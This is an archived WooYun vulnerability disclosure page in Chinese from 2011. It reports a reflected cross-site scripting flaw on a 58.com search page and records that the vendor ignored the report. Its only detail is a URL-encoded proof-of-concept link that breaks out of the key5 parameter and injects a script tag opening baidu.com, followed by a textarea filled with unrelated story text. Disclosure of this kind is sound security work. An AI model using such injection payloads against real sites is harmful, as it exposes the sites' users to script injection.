当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02171

漏洞标题:对GET方式提交的字符缺乏过滤

相关厂商:58同城

漏洞作者: perhaps

提交时间:2011-05-24 16:34

修复时间:2011-05-29 18:00

公开时间:2011-05-29 18:00

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-05-24: 细节已通知厂商并且等待厂商处理中
2011-05-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

http://sou114.58.com.cn/58show.php?key5= 漏洞很可怕,几乎没有过滤任何来自浏览器的字符……服务器端允许执行的脚本也很广泛,生意兴隆,安全第一,呵呵。

详细说明:

http://sou114.58.com.cn/58show.php?key5=%E4%BA%A4%E5%8F%8B%22%3E%3Cscript%20window.open(%22www.baidu.com%22)%3C/script%3E%3Ctextarea%20cols=100%20rows=111%3E%E8%BF%99%E6%A0%B7%E5%8F%8D%E5%A4%8D%E4%BA%86%E8%AE%B8%E5%A4%9A%E5%90%8E%E6%AC%A1%E5%90%8E%EF%BC%8C%E9%82%A3%E7%94%B7%E4%BA%BA%E5%BE%84%E8%87%AA%E8%B5%B7%E8%BA%AB%E8%B5%B0%E5%87%BA%E9%97%A8%E5%A4%96%E5%8E%BB%EF%BC%8C%E5%A5%B3%E4%BA%BA%E4%BC%B8%E5%A4%B4%E5%96%8A%E4%BA%86%E5%87%A0%E5%A3%B0%E4%BB%96%E4%B9%9F%E4%B8%8D%E7%90%86%E3%80%82%E7%AD%89%E6%88%91%E5%BF%AB%E5%90%83%E5%AE%8C%E6%97%B6%EF%BC%8C%E9%82%A3%E7%94%B7%E4%BA%BA%E5%9B%9E%E6%9D%A5%E4%BA%86%EF%BC%8C%E6%89%8B%E9%87%8C%E8%BF%98%E6%8A%93%E7%9D%80%E4%B8%80%E4%B8%AA%E6%96%B0%E8%80%83%E5%A5%BD%E7%9A%84%E7%BA%A2%E8%96%AF%EF%BC%8C%E8%BF%98%E5%86%92%E7%9D%80%E7%99%BD%E7%99%BD%E7%9A%84%E7%83%AD%E6%B0%94%E3%80%82%E4%BB%96%E7%A2%B0%E4%BA%86%E4%B8%80%E4%B8%8B%E5%A5%B3%E4%BA%BA%EF%BC%8C%E5%B0%B1%E5%B0%86%E7%83%AD%E4%B9%8E%E4%B9%8E%E7%9A%84%E7%BA%A2%E8%96%AF%E8%BF%9E%E7%9A%AE%E9%83%BD%E6%B2%A1%E5%89%A5%E5%BC%80%E5%B0%B1%E5%A1%9E%E5%88%B0%E5%A5%B3%E4%BA%BA%E6%89%8B%E9%87%8C%EF%BC%8C%E4%BD%8E%E5%A3%B0%E5%9C%B0%E8%AF%B4%EF%BC%9A%E2%80%9C%E5%90%83%E5%90%A7%EF%BC%81%E2%80%9D%E5%B8%A6%E7%9D%80%E6%B5%93%E5%8E%9A%E7%9A%84%E5%9C%B0%E6%96%B9%E5%8F%A3%E9%9F%B3%E3%80%82%E6%88%91%E7%9C%8B%E5%88%B0%E5%A5%B3%E4%BA%BA%E5%8F%91%E6%84%A3%E5%9C%B0%E7%9C%8B%E4%BA%86%E7%9C%8B%E8%87%AA%E5%B7%B1%E7%9A%84%E4%B8%88%E5%A4%AB%E4%B8%80%E4%B8%8B%EF%BC%8C%E8%84%B8%E4%B8%8A%E6%B5%AE%E7%8E%B0%E5%87%BA%E4%BA%86%E5%B9%B8%E7%A6%8F%E7%9A%84%E5%BE%AE%E7%AC%91%E3%80%82%E6%88%91%E7%8C%9C%E6%83%B3%EF%BC%8C%E5%A5%B9%E5%A4%A7%E6%A6%82%E6%98%AF%E6%83%8A%E8%AE%B6%E8%87%AA%E5%B7%B1%E7%9A%84%E4%B8%88%E5%A4%AB%E5%B9%B3%E6%97%B6%E4%B8%8D%E8%88%8D%E5%BE%97%E8%8A%B1%E9%92%B1%EF%BC%8C%E4%BD%86%E4%BB%8A%E5%A4%A9%E5%8D%B4%E8%8A%B1%E9%92%B1%E4%B8%BA%E8%87%AA%E5%B7%B1%E4%B9%B0%E5%90%83%E7%9A%84%E3%80%82%E7%84%B6%E5%90%8E%EF%BC%8C%E5%A5%B3%E4%BA%BA%E5%B0%B1%E5%BC%80%E5%A7%8B%E7%BB%86%E7%BB%86%E5%9C%B0%E3%80%81%E5%B0%8F%E5%BF%83%E5%9C%B0%E5%90%83%E5%90%83%E7%9D%80%E3%80%82%E5%BD%93%E5%8F%AA%E5%89%A9%E4%B8%8B%E4%B8%80%E5%8D%8A%E5%90%8E%EF%BC%8C%E5%A5%B9%E5%BF%BD%E7%84%B6%E5%81%9C%E4%B8%8B%E6%9D%A5%EF%BC%8C%E6%8A%8A%E6%89%8B%E9%87%8C%E7%9A%84%E5%8D%8A%E5%9D%97%E7%BA%A2%E8%96%AF%E9%80%92%E5%88%B0%E4%B8%88%E5%A4%AB%E7%9A%84%E5%98%B4%E8%BE%B9%EF%BC%8C%E8%AF%B4%EF%BC%9A%E2%80%9C%E6%88%91%E5%90%83%E9%A5%B1%E4%BA%86%EF%BC%8C%E4%BD%A0%E5%90%83%E5%90%A7%EF%BC%81%E2%80%9D%E5%90%8C%E6%A0%B7%E5%B8%A6%E7%9D%80%E6%B5%93%E9%87%8D%E7%9A%84%E5%9C%B0%E6%96%B9%E5%8F%A3%E9%9F%B3%E3%80%82%E5%A5%B9%E4%B8%88%E5%A4%AB%E6%8E%A8%E5%BC%80%E8%AF%B4%EF%BC%9A%E2%80%9C%E6%88%91%E4%B8%8D%E5%90%83%E3%80%82%E2%80%9D%E8%99%BD%E7%84%B6%E9%82%A3%E7%94%B7%E4%BA%BA%E8%AF%B4%E4%B8%8D%E5%90%83%EF%BC%8C%E4%BD%86%E6%98%AF%E4%BB%96%E5%8D%B4%E6%82%84%E6%82%84%E5%9C%B0%E5%92%BD%E4%BA%86%E5%92%BD%E5%8F%A3%E6%B0%B4%EF%BC%8C%E5%9B%A0%E4%B8%BA%E6%88%91%E7%9C%8B%E5%88%B0%E4%BB%96%E7%9A%84%E5%96%89%E7%BB%93%E5%8A%A8%E4%BA%86%E5%8A%A8%E3%80%82%E4%B8%A4%E4%BA%BA%E6%8E%A8%E6%9D%A5%E6%8E%A8%E5%8E%BB%E5%A5%BD%E4%B8%80%E4%BC%9A%E5%84%BF%E5%90%8E%EF%BC%8C%E5%A5%B3%E4%BA%BA%E5%B0%B1%E5%BC%BA%E8%A1%8C%E5%B0%86%E7%BA%A2%E8%96%AF%E5%A1%9E%E5%88%B0%E7%94%B7%E4%BA%BA%E7%9A%84%E6%89%8B%E9%87%8C%EF%BC%8C%E5%A5%B3%E4%BA%BA%E7%9C%8B%E7%94%B7%E4%BA%BA%E5%90%83%E5%AE%8C%EF%BC%8C%E4%BE%BF%E7%9B%B8%E8%A7%86%E8%80%8C%E7%AC%91%EF%BC%8C%E7%84%B6%E5%90%8E%E5%8F%88%E9%9D%A0%E5%9C%A8%E4%B8%80%E8%B5%B7%E7%BC%A9%E7%9D%80%E5%9D%90%E7%9D%80%E3%80%82%E9%82%A3%E5%A5%B3%E4%BA%BA%E7%9C%8B%E5%88%B0%E6%88%91%E7%9C%8B%E4%BB%96%E4%BF%A9%EF%BC%8C%E5%8F%88%E5%BE%AE%E5%BE%AE%E7%9A%84%E7%AC%91%E4%BA%86%E7%AC%91&%3C/textarea%3E

漏洞证明:

修复方案:

版权声明:转载请注明来源 perhaps@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2011-05-29 18:00

厂商回复:

漏洞Rank:3 (WooYun评价)

最新状态:

暂无